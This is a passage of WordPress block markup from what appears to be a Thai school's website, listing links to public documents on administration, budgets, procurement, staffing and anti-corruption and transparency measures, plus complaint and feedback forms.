href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 